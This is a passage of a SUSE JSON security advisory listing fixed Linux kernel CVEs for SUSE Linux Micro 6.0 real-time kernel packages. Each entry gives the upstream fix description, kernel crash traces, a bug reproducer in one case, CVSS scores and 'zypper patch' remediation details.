"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53839"
},
{
"cve": "CVE-2023-53841",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53841"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndevlink: report devlink_port_type_warn source device\n\ndevlink_port_type_warn is scheduled for port devlink and warning\nwhen the port type is not set. But from this warning it is not easy\nfound out which device (driver) has no devlink port set.\n\n[ 3709.975552] Type was not set for devlink port.\n[ 3709.975579] WARNING: CPU: 1 PID: 13092 at net/devlink/leftover.c:6775 devlink_port_type_warn+0x11/0x20\n[ 3709.993967] Modules linked in: openvswitch nf_conncount nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nfnetlink bluetooth rpcsec_gss_krb5 auth_rpcgss nfsv4 dns_resolver nfs lockd grace fscache netfs vhost_net vhost vhost_iotlb tap tun bridge stp llc qrtr intel_rapl_msr intel_rapl_common i10nm_edac nfit libnvdimm x86_pkg_temp_thermal mlx5_ib intel_powerclamp coretemp dell_wmi ledtrig_audio sparse_keymap ipmi_ssif kvm_intel ib_uverbs rfkill ib_core video kvm iTCO_wdt acpi_ipmi intel_vsec irqbypass ipmi_si iTCO_vendor_support dcdbas ipmi_devintf mei_me ipmi_msghandler rapl mei intel_cstate isst_if_mmio isst_if_mbox_pci dell_smbios intel_uncore isst_if_common i2c_i801 dell_wmi_descriptor wmi_bmof i2c_smbus intel_pch_thermal pcspkr acpi_power_meter xfs libcrc32c sd_mod sg nvme_tcp mgag200 i2c_algo_bit nvme_fabrics drm_shmem_helper drm_kms_helper nvme syscopyarea ahci sysfillrect sysimgblt nvme_core fb_sys_fops crct10dif_pclmul libahci mlx5_core sfc crc32_pclmul nvme_common drm\n[ 3709.994030] crc32c_intel mtd t10_pi mlxfw libata tg3 mdio megaraid_sas psample ghash_clmulni_intel pci_hyperv_intf wmi dm_multipath sunrpc dm_mirror dm_region_hash dm_log dm_mod be2iscsi bnx2i cnic uio cxgb4i cxgb4 tls libcxgbi libcxgb qla4xxx iscsi_boot_sysfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi fuse\n[ 3710.108431] CPU: 1 PID: 13092 Comm: kworker/1:1 Kdump: loaded Not tainted 5.14.0-319.el9.x86_64 #1\n[ 3710.108435] Hardware name: Dell Inc. PowerEdge R750/0PJ80M, BIOS 1.8.2 09/14/2022\n[ 3710.108437] Workqueue: events devlink_port_type_warn\n[ 3710.108440] RIP: 0010:devlink_port_type_warn+0x11/0x20\n[ 3710.108443] Code: 84 76 fe ff ff 48 c7 03 20 0e 1a ad 31 c0 e9 96 fd ff ff 66 0f 1f 44 00 00 0f 1f 44 00 00 48 c7 c7 18 24 4e ad e8 ef 71 62 ff \u003c0f\u003e 0b c3 cc cc cc cc 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 f6 87\n[ 3710.108445] RSP: 0018:ff3b6d2e8b3c7e90 EFLAGS: 00010282\n[ 3710.108447] RAX: 0000000000000000 RBX: ff366d6580127080 RCX: 0000000000000027\n[ 3710.108448] RDX: 0000000000000027 RSI: 00000000ffff86de RDI: ff366d753f41f8c8\n[ 3710.108449] RBP: ff366d658ff5a0c0 R08: ff366d753f41f8c0 R09: ff3b6d2e8b3c7e18\n[ 3710.108450] R10: 0000000000000001 R11: 0000000000000023 R12: ff366d753f430600\n[ 3710.108451] R13: ff366d753f436900 R14: 0000000000000000 R15: ff366d753f436905\n[ 3710.108452] FS: 0000000000000000(0000) GS:ff366d753f400000(0000) knlGS:0000000000000000\n[ 3710.108453] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 3710.108454] CR2: 00007f1c57bc74e0 CR3: 000000111d26a001 CR4: 0000000000773ee0\n[ 3710.108456] PKRU: 55555554\n[ 3710.108457] Call Trace:\n[ 3710.108458] \u003cTASK\u003e\n[ 3710.108459] process_one_work+0x1e2/0x3b0\n[ 3710.108466] ? rescuer_thread+0x390/0x390\n[ 3710.108468] worker_thread+0x50/0x3a0\n[ 3710.108471] ? rescuer_thread+0x390/0x390\n[ 3710.108473] kthread+0xdd/0x100\n[ 3710.108477] ? kthread_complete_and_exit+0x20/0x20\n[ 3710.108479] ret_from_fork+0x1f/0x30\n[ 3710.108485] \u003c/TASK\u003e\n[ 3710.108486] ---[ end trace 1b4b23cd0c65d6a0 ]---\n\nAfter patch:\n[ 402.473064] ice 0000:41:00.0: Type was not set for devlink port.\n[ 402.473064] ice 0000:41:00.1: Type was not set for devlink port.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53841",
"url": "https://www.suse.com/security/cve/CVE-2023-53841"
},
{
"category": "external",
"summary": "SUSE Bug 1255009 for CVE-2023-53841",
"url": "https://bugzilla.suse.com/1255009"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2023-53841"
},
{
"cve": "CVE-2023-53842",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53842"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: codecs: wcd-mbhc-v2: fix resource leaks on component remove\n\nThe MBHC resources must be released on component probe failure and\nremoval so can not be tied to the lifetime of the component device.\n\nThis is specifically needed to allow probe deferrals of the sound card\nwhich otherwise fails when reprobing the codec component:\n\n snd-sc8280xp sound: ASoC: failed to instantiate card -517\n genirq: Flags mismatch irq 299. 00002001 (mbhc sw intr) vs. 00002001 (mbhc sw intr)\n wcd938x_codec audio-codec: Failed to request mbhc interrupts -16\n wcd938x_codec audio-codec: mbhc initialization failed\n wcd938x_codec audio-codec: ASoC: error at snd_soc_component_probe on audio-codec: -16\n snd-sc8280xp sound: ASoC: failed to instantiate card -16",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53842",
"url": "https://www.suse.com/security/cve/CVE-2023-53842"
},
{
"category": "external",
"summary": "SUSE Bug 1254690 for CVE-2023-53842",
"url": "https://bugzilla.suse.com/1254690"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53842"
},
{
"cve": "CVE-2023-53843",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53843"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: openvswitch: reject negative ifindex\n\nRecent changes in net-next (commit 759ab1edb56c (\"net: store netdevs\nin an xarray\")) refactored the handling of pre-assigned ifindexes\nand let syzbot surface a latent problem in ovs. ovs does not validate\nifindex, making it possible to create netdev ports with negative\nifindex values. It\u0027s easy to repro with YNL:\n\n$ ./cli.py --spec netlink/specs/ovs_datapath.yaml \\\n --do new \\\n\t --json \u0027{\"upcall-pid\": 1, \"name\":\"my-dp\"}\u0027\n$ ./cli.py --spec netlink/specs/ovs_vport.yaml \\\n\t --do new \\\n\t --json \u0027{\"upcall-pid\": \"00000001\", \"name\": \"some-port0\", \"dp-ifindex\":3,\"ifindex\":4294901760,\"type\":2}\u0027\n\n$ ip link show\n-65536: some-port0: \u003cBROADCAST,MULTICAST\u003e mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000\n link/ether 7a:48:21:ad:0b:fb brd ff:ff:ff:ff:ff:ff\n...\n\nValidate the inputs. Now the second command correctly returns:\n\n$ ./cli.py --spec netlink/specs/ovs_vport.yaml \\\n\t --do new \\\n\t --json \u0027{\"upcall-pid\": \"00000001\", \"name\": \"some-port0\", \"dp-ifindex\":3,\"ifindex\":4294901760,\"type\":2}\u0027\n\nlib.ynl.NlError: Netlink error: Numerical result out of range\nnl_len = 108 (92) nl_flags = 0x300 nl_type = 2\n\terror: -34\textack: {\u0027msg\u0027: \u0027integer out of range\u0027, \u0027unknown\u0027: [[type:4 len:36] b\u0027\\x0c\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x03\\x00\\xff\\xff\\xff\\x7f\\x00\\x00\\x00\\x00\\x08\\x00\\x01\\x00\\x08\\x00\\x00\\x00\u0027], \u0027bad-attr\u0027: \u0027.ifindex\u0027}\n\nAccept 0 since it used to be silently ignored.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53843",
"url": "https://www.suse.com/security/cve/CVE-2023-53843"
},
{
"category": "external",
"summary": "SUSE Bug 1254705 for CVE-2023-53843",
"url": "https://bugzilla.suse.com/1254705"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53843"
},
{
"cve": "CVE-2023-53844",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53844"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/ttm: Don\u0027t leak a resource on swapout move error\n\nIf moving the bo to system for swapout failed, we were leaking\na resource. Fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53844",
"url": "https://www.suse.com/security/cve/CVE-2023-53844"
},
{
"category": "external",
"summary": "SUSE Bug 1254649 for CVE-2023-53844",
"url": "https://bugzilla.suse.com/1254649"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53844"
},
{
"cve": "CVE-2023-53846",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53846"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: fix to do sanity check on direct node in truncate_dnode()\n\nsyzbot reports below bug:\n\nBUG: KASAN: slab-use-after-free in f2fs_truncate_data_blocks_range+0x122a/0x14c0 fs/f2fs/file.c:574\nRead of size 4 at addr ffff88802a25c000 by task syz-executor148/5000\n\nCPU: 1 PID: 5000 Comm: syz-executor148 Not tainted 6.4.0-rc7-syzkaller-00041-ge660abd551f1 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 05/27/2023\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0xd9/0x150 lib/dump_stack.c:106\n print_address_description.constprop.0+0x2c/0x3c0 mm/kasan/report.c:351\n print_report mm/kasan/report.c:462 [inline]\n kasan_report+0x11c/0x130 mm/kasan/report.c:572\n f2fs_truncate_data_blocks_range+0x122a/0x14c0 fs/f2fs/file.c:574\n truncate_dnode+0x229/0x2e0 fs/f2fs/node.c:944\n f2fs_truncate_inode_blocks+0x64b/0xde0 fs/f2fs/node.c:1154\n f2fs_do_truncate_blocks+0x4ac/0xf30 fs/f2fs/file.c:721\n f2fs_truncate_blocks+0x7b/0x300 fs/f2fs/file.c:749\n f2fs_truncate.part.0+0x4a5/0x630 fs/f2fs/file.c:799\n f2fs_truncate include/linux/fs.h:825 [inline]\n f2fs_setattr+0x1738/0x2090 fs/f2fs/file.c:1006\n notify_change+0xb2c/0x1180 fs/attr.c:483\n do_truncate+0x143/0x200 fs/open.c:66\n handle_truncate fs/namei.c:3295 [inline]\n do_open fs/namei.c:3640 [inline]\n path_openat+0x2083/0x2750 fs/namei.c:3791\n do_filp_open+0x1ba/0x410 fs/namei.c:3818\n do_sys_openat2+0x16d/0x4c0 fs/open.c:1356\n do_sys_open fs/open.c:1372 [inline]\n __do_sys_creat fs/open.c:1448 [inline]\n __se_sys_creat fs/open.c:1442 [inline]\n __x64_sys_creat+0xcd/0x120 fs/open.c:1442\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x39/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nThe root cause is, inodeA references inodeB via inodeB\u0027s ino, once inodeA\nis truncated, it calls truncate_dnode() to truncate data blocks in inodeB\u0027s\nnode page, it traverse mapping data from node-\u003ei.i_addr[0] to\nnode-\u003ei.i_addr[ADDRS_PER_BLOCK() - 1], result in out-of-boundary access.\n\nThis patch fixes to add sanity check on dnode page in truncate_dnode(),\nso that, it can help to avoid triggering such issue, and once it encounters\nsuch issue, it will record newly introduced ERROR_INVALID_NODE_REFERENCE\nerror into superblock, later fsck can detect such issue and try repairing.\n\nAlso, it removes f2fs_truncate_data_blocks() for cleanup due to the\nfunction has only one caller, and uses f2fs_truncate_data_blocks_range()\ninstead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53846",
"url": "https://www.suse.com/security/cve/CVE-2023-53846"
},
{
"category": "external",
"summary": "SUSE Bug 1254983 for CVE-2023-53846",
"url": "https://bugzilla.suse.com/1254983"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53846"
},
{
"cve": "CVE-2023-53847",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53847"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb-storage: alauda: Fix uninit-value in alauda_check_media()\n\nSyzbot got KMSAN to complain about access to an uninitialized value in\nthe alauda subdriver of usb-storage:\n\nBUG: KMSAN: uninit-value in alauda_transport+0x462/0x57f0\ndrivers/usb/storage/alauda.c:1137\nCPU: 0 PID: 12279 Comm: usb-storage Not tainted 5.3.0-rc7+ #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS\nGoogle 01/01/2011\nCall Trace:\n __dump_stack lib/dump_stack.c:77 [inline]\n dump_stack+0x191/0x1f0 lib/dump_stack.c:113\n kmsan_report+0x13a/0x2b0 mm/kmsan/kmsan_report.c:108\n __msan_warning+0x73/0xe0 mm/kmsan/kmsan_instr.c:250\n alauda_check_media+0x344/0x3310 drivers/usb/storage/alauda.c:460\n\nThe problem is that alauda_check_media() doesn\u0027t verify that its USB\ntransfer succeeded before trying to use the received data. What\nshould happen if the transfer fails isn\u0027t entirely clear, but a\nreasonably conservative approach is to pretend that no media is\npresent.\n\nA similar problem exists in a usb_stor_dbg() call in\nalauda_get_media_status(). In this case, when an error occurs the\ncall is redundant, because usb_stor_ctrl_transfer() already will print\na debugging message.\n\nFinally, unrelated to the uninitialized memory access, is the fact\nthat alauda_check_media() performs DMA to a buffer on the stack.\nFortunately usb-storage provides a general purpose DMA-able buffer for\nuses like this. We\u0027ll use it instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53847",
"url": "https://www.suse.com/security/cve/CVE-2023-53847"
},
{
"category": "external",
"summary": "SUSE Bug 1254698 for CVE-2023-53847",
"url": "https://bugzilla.suse.com/1254698"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53847"
},
{
"cve": "CVE-2023-53848",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53848"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd/raid5-cache: fix a deadlock in r5l_exit_log()\n\nCommit b13015af94cf (\"md/raid5-cache: Clear conf-\u003elog after finishing\nwork\") introduce a new problem:\n\n// caller hold reconfig_mutex\nr5l_exit_log\n flush_work(\u0026log-\u003edisable_writeback_work)\n\t\t\tr5c_disable_writeback_async\n\t\t\t wait_event\n\t\t\t /*\n\t\t\t * conf-\u003elog is not NULL, and mddev_trylock()\n\t\t\t * will fail, wait_event() can never pass.\n\t\t\t */\n conf-\u003elog = NULL\n\nFix this problem by setting \u0027config-\u003elog\u0027 to NULL before wake_up() as it\nused to be, so that wait_event() from r5c_disable_writeback_async() can\nexist. In the meantime, move forward md_unregister_thread() so that\nnull-ptr-deref this commit fixed can still be fixed.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53848",
"url": "https://www.suse.com/security/cve/CVE-2023-53848"
},
{
"category": "external",
"summary": "SUSE Bug 1254753 for CVE-2023-53848",
"url": "https://bugzilla.suse.com/1254753"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53848"
},
{
"cve": "CVE-2023-53850",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53850"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niavf: use internal state to free traffic IRQs\n\nIf the system tries to close the netdev while iavf_reset_task() is\nrunning, __LINK_STATE_START will be cleared and netif_running() will\nreturn false in iavf_reinit_interrupt_scheme(). This will result in\niavf_free_traffic_irqs() not being called and a leak as follows:\n\n [7632.489326] remove_proc_entry: removing non-empty directory \u0027irq/999\u0027, leaking at least \u0027iavf-enp24s0f0v0-TxRx-0\u0027\n [7632.490214] WARNING: CPU: 0 PID: 10 at fs/proc/generic.c:718 remove_proc_entry+0x19b/0x1b0\n\nis shown when pci_disable_msix() is later called. Fix by using the\ninternal adapter state. The traffic IRQs will always exist if\nstate == __IAVF_RUNNING.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53850",
"url": "https://www.suse.com/security/cve/CVE-2023-53850"
},
{
"category": "external",
"summary": "SUSE Bug 1254677 for CVE-2023-53850",
"url": "https://bugzilla.suse.com/1254677"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-53850"
},
{
"cve": "CVE-2023-53851",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53851"
}
],
"notes": [
{
"category": "general",
